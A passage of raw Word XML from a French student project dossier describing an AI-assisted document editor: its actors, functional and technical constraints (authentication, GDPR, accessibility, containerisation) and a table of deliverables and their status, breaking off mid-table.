      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">les textes de l'interface, et les prompts, font partie des spécifications</w:t>
      </w:r>
      <w:r>
        <w:t>, au même titre qu'une route ou un modèle de données. Ils dérivent d'autant plus facilement qu'aucun test ne les couvre, et seule une relecture confrontée au cahier des charges les rattrape. C'est la raison d'être du cas de test TU-04 du § 9, qui verrouille désormais ce point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ce qu'une capture d'écran ne dit pas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La même relecture m'a rappelé la limite inverse de l'exercice. La capture C-07 montre l'écran de création d'un document vierge : l'indicateur d'enregistrement automatique n'y apparaît pas, puisque aucune frappe n'a encore eu lieu et que le titre est vide. Conclure de cette capture que la fonctionnalité était absente aurait été une erreur de méthode :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">une capture atteste d'un état, pas d'un comportement</w:t>
      </w:r>
      <w:r>
        <w:t>. Vérifier une fonctionnalité demande de lire le code ou d'exécuter un scénario, pas de regarder une image fixe. C'est précisément la raison d'être du jeu d'essai documenté en § 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BAF12" w14:textId="74055DB3" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc198828309"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Les spécifications fonctionnelles du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Acteurs et vue d'ensemble</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois acteurs interviennent dans le système :</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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Périmètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Visiteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Utilisateur non authentifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pages publiques (accueil, fonctionnalités, tarifs, modèles, pages légales), inscription, connexion, demande de réinitialisation de mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compte authentifié, rôle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ses documents et dossiers, les trois actions IA dans la limite de son quota, l'historique IA de ses documents, son profil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Administrateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compte authentifié, rôle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tout le périmètre utilisateur, plus le back-office : liste des comptes, modification du rôle et du quota, suppression de compte, statistiques globales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le moteur d'inférence local (Ollama) est un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">système externe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sollicité par l'API, jamais par le navigateur.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="44" w:name="Xc9c6ce25359aa4a035671141044e249dafa2795"/>
    <w:p w14:paraId="0C482C7E" w14:textId="28F4E18E" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc198828310"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Les contraintes du projet et livrables attendus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contraintes fonctionnelles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois actions IA et trois seulement : reformuler, corriger, compléter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaque action doit pouvoir s'appliquer soit à une sélection de texte, soit au document entier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le résultat doit pouvoir être inséré à côté du texte d'origine ou le remplacer ; l'utilisateur garde la décision finale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un utilisateur ne voit et ne modifie que ses propres documents et dossiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quota de 20 requêtes IA par utilisateur et par période de 24 heures, modifiable par un administrateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toute interaction IA est journalisée avec le contenu avant et après.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois statuts de document : brouillon, à relire, terminé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'enregistrement du document est automatique, déclenché après un délai d'inactivité, et doublé d'une action explicite.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="Xd0b0a02a96993c76841ad3e8e0e080678b3f0c9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contraintes techniques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Contrainte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Traduction dans le projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentification sécurisée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hachage bcrypt, JWT HS256 (access token 15 min), refresh token en cookie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">httpOnly</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>SameSite=Strict</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, avec rotation ; seule l'empreinte SHA-256 du jeton est stockée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Protection XSS / CSRF / injections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requêtes paramétrées par l'ORM, validation systématique des entrées, CORS restreint à l'origine du front, rendu Markdown assaini par DOMPurify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Données sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mots de passe hachés (bcrypt), jetons de réinitialisation et de rafraîchissement stockés sous forme d'empreinte SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucun secret dans le code :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">obligatoire, l'application refuse de démarrer sans elle ;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">APP_ENV</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">pilote l'attribut</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">du cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RGPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consentement explicite tracé en base, inférence locale sans transmission à un tiers, pages légales intégrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Transparence IA (AI Act)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Information de l'utilisateur sur la nature générée des propositions — partiellement couvert, complément identifié en § 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accessibilité RGAA 4.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contrastes, navigation clavier, attributs ARIA, contrôle Lighthouse / WAVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éco-conception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chargement différé des routes, dépendances limitées, compression à la livraison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conteneurisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker et docker-compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Intégration continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="X527ae347fc50108fde803a6d4306970f190206b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contraintes de projet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le projet est réalisé seule, sur la durée de la formation, avec une double finalité : répondre au cahier des charges de LexiCorp et couvrir les compétences du titre CDA. Cette seconde contrainte impose des livrables que le cahier des charges ne demanderait pas nécessairement à ce niveau de détail — diagrammes UML, jeu d'essai documenté, journal de veille.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="X44b9dd4f4281d9a60a80e4465fbc75119791d61"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Livrables attendus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Livrables techniques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Obligatoire pour le titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">État</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Code source structuré et documenté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Livré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dossier projet (architecture, base de données, diagrammes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">En cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scripts SQL de création et de migration de la base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Livrés et exécutés en dev (§ 5.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scripts de déploiement (Docker, CI/CD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Livrés — docker-compose.yml, deux Dockerfile, pipeline CI (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env.example</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">documentant les variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Livré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Journal de veille (IA, sécurité, accessibilité)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Livré</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>(§ 11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Livrables fonctionnels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Obligatoire pour le titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">État</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentation utilisateur (PDF ou web)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À faire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Présentation orale avec diaporama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À faire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Plan de tests et jeu d'essai documentés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
